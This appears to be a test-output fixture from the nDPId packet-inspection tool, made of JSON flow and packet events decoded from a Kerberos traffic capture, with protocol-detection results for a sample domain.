00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337929815,"pkt":"pB9ywglqAAgCHEeuCABFAACxACFAAIAGkTSsEAjJrBAICMAHAFgBsoC8gS4auFAYAQDUqQAAiNeE+tCJIo9Cz1KFHGicigIlxkFIEVkb70vifDKvvi6NwB24GlkehWdocuUvESpeAqtSofWtuKDm2yskVOheE+r4DxaQxRLncJy9zYBP+p7ofQvBukmarkg+oY3ctA8jgj5BSy2yi42NlxJjhcjuX3ByLG+GD20zq41Le0TbPh0TFS5qkRb0Q24="}
00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337929815,"pkt":"AAgCHEeupB9ywglqCABFAACbEx9AAIAGfkysEAgIrBAIyQBYwAeBLiBsAbKBRVAYAQBP\/wAA1H56bb56rLTzhI\/so6pGl6jILu03bHY2ZWl4A41JY07Kavo1sQRKhlNPx3vE\/LdSF6BX6NLW1Fm3Tdmvr7ZEbPWOq8FZs9c0RBY7wJbwPUW44FlC0vhqJn1yGB3K1Fxl0gPqAAMzMrhupJQMQzjV4fgdag=="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337929816,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/ACZAAIAGjCGsEAjJrBAICMAIAFgkzleN\/pyBM1AYAQCd1QAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1l4LwpNuTjPo\/WSca61wgawIInNQ2vTGqwCxtV1QigPfApKXxUIq16oPsvd5TUFFBoZ3psSaal0IeVBLFx\/BX1XOMXvlpVRB9MsTpZwTQ9ax1GLB6I2i5bbUZpknsnBAKrSXL695P06nXI2pxBPckcoFwJAlSBEmG2XByE8IS7rO1EarXMbJ6Y6aTY3qAJfaaRab4vHhRG2Vuf+5JWuR5w1NLPXeeoD\/rArSk0gCVLkR21SKfZcS\/vqPldqO0np7TLmMBVoYjsl6PiI0+4z2cMBft\/qbxRIxb8y1vWhjoJ64ue7lCoT2cvFOdVWD\/WH\/fANzw0ML9F0vLIXCgI1qi1sWcerxATeYpOyo7DWpsJioH9jxAPx+B6RM+9U5zQIKM9BdT3C3olrkQMfOua6FPtyqIt9kVcakdowBTS4+NidzK5sGlYIRntlAxGR8YU5brzwGdboEMfsAHK11qtTE6t\/tDmgr1+cFgW34p7q9yjtfw3IlMfNtNF6cVYmOh6G5Wnxcfjqbsrpj7Kw6mjBwfKtaYNJG6XthlVKo9I4FpdysFIteChs2N+mQtafp0AWZxKjjDKO8sohbJklYhyoJOto52hds26FAU4LmrIc5fMmADp1PG\/tBDi0BnZ3SimtoeWyM2fnwWhBrH67Gc6TeKPHSeyVFwR1fSnMxZTlzS7KXwLa62U6BZ0WNCBZzIdUTje6\/aUFTq4XeeR0Z7Vh6Z9DZ9om\/9wiQsBPMMalPRPnqfmOZT7HV5yr74UqmbVg1OWh8En3RVYoEzl+U9UxwXXFIR5zUwJrSv4BRCrfouK2f87lMtCFEg\/zEl+Ya6jB+A9XZfPbLOpJ+x1ZsBKiE7MFw9X4cPsiIvoIaHcwmirVOaa9JrhuL72qg0GrV2LWFm+xJt5NjWGhgRHFok1jp2URmHs7J3zvdeb+nbPHLvYUdtkqwb3aoYEr1Xmflw8UpDr6MDbT2en\/\/11z39903bvFGohUv62WN4swCRiY9JjXJUs610D4Xxus5+CL0zgzTQQAxEvC4LL9CQELhrXgdhbQmsotNytXnsgYuKhF4RMS5q5UH8sx1AGsmSntAJ\/W4iO+\/MbV3oU5HdPpcERFm3hfRy\/GBSS75vadxxOcRHZA6iF9\/pQ9BlFHhHcWkaQuZyUL6qH1sbSQyui0sXjtHojjpnPlsTpEM9hpMt6LhooASI6ATNe\/Xw7kB+HTJthDR\/bJnXbftcEdtnk7dLQYL5MfhSH8BDyuI9MMLmdpozP+V7mPT5HhUnsqRSQWCVyfiuDhL0shZpk83f0xNTTmK8fhSYF8Q1BGkgZwwgZmgAwIBEqKBkQSBjpT6WKZ4R5UUi5WTtSgEkEd7jMLa6AoUPu4TwrcLKGcmB9vngXIzOhZvqCgHdzOkHetRjgLUyTIXem1PFxz6mY8TxQcIZDyb19SN3Nd3sKaxs2IYEv7YHwXG6E8LM8hJLH2m\/TyiwnWxB70uZ574gAkF4FD1Zq+qMVWQ8VxsOQkGL92ElZ2TaAS4GGYCEnUwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7NBe6oBTADAgES"}
00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337929816,"pkt":"AAgCHEeupB9ywglqCABFAAXMEyNAAIAGeResEAgIrBAIyQBYwAj+nIEzJM5dJFAYAQC28wAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9ZmgNa1dr3wGd87q5o3XWLsTIWysbTgkwJr+Tn54CyV4AH6vlEgusASRdJcyvN0onPWOO9TStPkihUEobLQ8WG5\/BAe\/pJm76NJeRjK9kGGi8G\/0XbFCYSPepa5PQwmUgAjsgxX98uOoIoeMgpxrDD2I4YnqT0o9T7E4u8XbTiIf+v3cdcN4dCZ+EoTKAM9GSdtpSP62\/Xb+2PxUXMWzXRKdBV4GPRc7M\/f3KRdK529+2pM4yLgF6mfdzw1YttOYiTQBSOIseZU5L5pWWwIAYUeadQLWeGW7MCmuOiezPfzHOKXT\/hMqEB\/2Egds2KA7Hm\/oP01r9IU6p42tCtn+I4EWSm5ZkiMAIXP6SCiOdO2PbdtR\/4GK9kZARZpgtLJG+aGmFpRzNAdcgcLMHN2OlX0J6+piruBM7Ww3kqLpZgruCuGx8K+d\/8FApmAeWnLmXbD3fu1T00fGd6fdKrkgCl98Sy4I0iKgJr019SubVPh\/tLfXvOPHFTskrZiab\/lkJMa\/lcaCHUWtHfBuxSsNJt7gody42oqvvYHikEn7VlQJDi\/u8KzU07HljjjoqhCYV678B3YcCsVdGefRzEoUzSdH\/BYJGW+CkosfzR7MiRBWyvn77tCF67oxZ3T5EhVst6OUOt05ejCBeF0j2P8Sa6RL1vPg6TCt7KX5yXzGdJtuRQYFzwHms4Ux+JYQXrmLh2ixoc55gWooUap7xcPOrj9EtgR7efu2PqGQVuytvq6rdV+3QUFA8AufxbPXK507+RBmLMcLcxZAxOp7SQc\/Ay3c\/ORhr+fWLV6VFfX75zufwBySCOGvrbuFXK0SnMVFwylor3lGY2Czl7Y5QKDcK4+FS+SJKTqaxj0EFxa2D+DbGLwbVt3zt9+tPhI+pr7vL0LtIL0O055Y3MLTTiVoB4FnEuGzQivRnPbXzFFcdCIUDcAh26XtB4LCpmd+fBTcLafa5ZKQ2nsR\/2LH7kpZxim50Hcvtyd5PzGPwKSVk2Q+psnZ0IehfsbwhALTs\/RQSOb7Rq41AGgy7OAH5YvpBKSd7qUDfb1gtLh6EIYhMprEuGvAg42lOnEYktaA8Y0X4PyM72xSTA9ZN+CxfcvwiIlvHf11TL5C5ZRBUy3du\/RJjPcfxsjqIdqVfXMDys4DGOvXOODvANQyMdpD2WSRWTBduQ+1useq7xNugt3rmAScfUohAT\/giN4TexFk96WUfGs376rRqExitzbuece0s6lptdaN+3sKDC1NFILlW4MQPBHpc3ComgefM9jAmeqLxMUur1iJW82d2i1F5BNiRpTZEFf7MD9poIBJjCCASKgAwIBEqKCARkEggEVQDvO7+WVQbXswJT\/WKenjoLOTOUb7xtnQSDSvTALA7cFBjKmG7py2Ll3YHsUrZQaKL2ZgS2bNcKYx\/3+lfvv+kAlvcN39ExBH9j9AGm8H1cRnFwNhRWCETnioXg\/P1Y2p+e3F0h6bOneEdLiePwHJv9FonrRV61HKyJDpzH6E0h5BR7t2eo\/60DJORIRuiguwoofBgNuIj9IIWatzAufVetcbqrWIpOgXa8Tl5itQ\/bI2zF6hwUS3TRThkmm+Lz7J7LBceoySEetzaEsRZtQYN6tENYmlD5+VEJvmJ\/Gk593lHeRAE07ZMXwY1fmEib\/vL\/sBgCUMH7CIYMAL4GjstMrJCbIeZhyoYmoahgOuedSq46aMw=="}
00733{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929817,"flow_last_seen":1549337929817,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337929817,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1549337929817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337929817,"pkt":"pB9ywglqAAgCHEeuCABFAAELACpAAIAGkNGsEAjJrBAICMAEAb1XsKRSOc8tT1AYAP5XOQAAtEaCpoUNMQEcRu8rXL+flRkpXPhHudnte7juaoAeTLu\/yTOr\/klMHDKYHSz0JIIsigIVsBaMl3PyJLoeb\/thjoYGSwkEC2m4nRdpRXAof0BuI3WnXPinh7MhPVCaTGyJNfqfVu\/1dc4+HXKYy76MWWV4zUtzQAeAZlVdIbuoLUlvFXjFSw5Ryb7lDA5ay5XLMnQY1U2bYUt6MYxBsLvHXZpUwBGPjxstpVTddlgnyYV1MOsJQv5Du0utIGTzTo6LpQrGUrUbi+j64I7Cmr+KeRuwdhEzhGbc+mJlwRYjD6cvIxA="}
00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337929818,"pkt":"AAgCHEeupB9ywglqCABFAAEsEydAAIAGfbOsEAgIrBAIyQG9wAQ5zy1PV7ClNVAYAQBD3AAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAIAAAAAAAAA\/\/4AAAAAAABZAAAAAAQAAM9KX1xrFqd60K9wkt\/rc1cJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbaDd4i7\/ItyR1a9jC52avEiTOhersM4IXB2s8eeK3O+ftonNzS3toSakh8sE2tBVm3gbqMBKq1zSZzBBR6cu+Hrjxp\/3xoJEFPVC\/4y\/BWmosce7zt2RHazTIcgt7F0qD+5oY0gWkTgMB+VU0Ro="}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929981,"flow_last_seen":1549337929981,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337929981,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1549337929981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337929981,"pkt":"pB9ywglqAAgCHEeuCABFAADBADZAAIAGkQ+sEAjJrBAICMAKAFgVCzarRRAS7FAYAQB2LAAAqoGWMIGToAMCARKigYsEgYi0+C7lIM6lpWfLcf2ezyusajpC0TYc1OX1vmb3DhkyjRtC5TeZRg9Wzt\/ubCTSXWpwv+zrJOhZpUKxM\/PhogQbKSmJJuvTC3n4CxJc9SponZNFKF1Kt9\/yiDsesCZaEKdbgZEf1rZ1aHAiihciexKw\/Qr8RPyDjBEhr0yc0K8+XP7zeT3kqKdm"}
00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAACmEzJAAIAGfi6sEAgIrBAIyQBYwApFEBigFQs3RFAYAQCNWQAABoWQU5dMx7s3k7lFXcqa6uoE3YqM179MtGFm5Pp0PzGMSHM6ikhCYuxEbF8vf630PDV4M+ymDkgmnA6LZ83pNOsEhGLNGEwQsGjuja+QpA2dd9fjedDg4z2eYZ9DeqXNfMVtviu+Fd00prhwc+9nnU9I900bDPmSAhZM9lsL"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337929983,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337929983,"pkt":"pB9ywglqAAgCHEeuCABFAAEyADpAAIAGkJqsEAjJrBAICMAJAYUOQjJnSJfL+1AYAQBrWQAA8TZc0LDMp13P2bhHUwE3wC3znhyPA6u84KleikgMfgmc3jalHTIxDwXMnjy\/W4F7\/2WZoUcx2XOew9rGWayLePl5BZIz7shN5PFXYJc\/9PAyv29TC7M2XLiMKexhyeYlRE9uvUtK9DAnR\/ttWEC9zdC56cQON1H8q936tfR+Slz7RKm2uwASDHI8fSFcEQQxtgqaAo4BBsj3qlqLB0lXoxQ8eGOcEVy2\/38vMlSj+c\/3tdAxc+T2J+ChqVKK6Ti6p9NJhgfdb6n6Fkr1nJ\/E0PHo7Ab3tBkqkSpNzV9oaIDc\/AnEKYXHdAsdm\/IAEKeNDZ3xj3dnB41oCyCZcvi9r2HqvrS9bMHFZEs="}
00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAAD6EzZAAIAGfdasEAgIrBAIyQGFwAlIl8v7DkIzcVAYAQBePQAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1fPlG7bKWdrh2HD6cpz+MijBmfhDcDSHRgxosMnwcbCi1ZRnrViGBtMC2nQv6mVUDSJapX\/mZgtc4l9ALb+\/jokxskSCIt0GZfBXlBh6SOp7g9nc\/2WT4mG5e+fctttNW4KixsBWTLsk4U0TsD"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337930192,"pkt":"pB9ywglqAAgCHEeuCABFAAEXAE9AAIAGkKCsEAjJrBAICMAOAFh1zEKiBQpS4FAYAQB22wAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE6HHTSoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="}
00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337930193,"pkt":"AAgCHEeupB9ywglqCABFAAE+E0ZAAIAGfYKsEAgIrBAIyQBYwA4FClLgdcxDkVAYAQCvKAAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDDGWApgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="}
00730{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337930193,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337930214,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAFNAAIAGkEysEAjJrBAICMAPAFhOqMfQDl0Bb1AYAQBFdgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4T+8E3pUi7h1ZsZOoIXjjwvAQAgQGpJXHn0jgIAIbXQei+GxBZQViNO7UVdhzj5KUys1PXrvG2C8wEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETocdNKgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337930214,"pkt":"AAgCHEeupB9ywglqCABFAACYE0tAAIAGfiOsEAgIrBAIyQBYwA8OXQcjTqjJD1AYAQBZNwAAQBgDyB6VZPxID+fu9kcivDlP7463Dy1IfrYrHVzuJLB3P27gpkccW43Mtu3NrktwKAyme0Z0QNo0JvH3ppwCLvPborHS7i5Jp9I5pxLf5LZX6AlmVea2udQa4ufUWkijqzhrShLiqrevOUKPGzj2OQ=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337930217,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
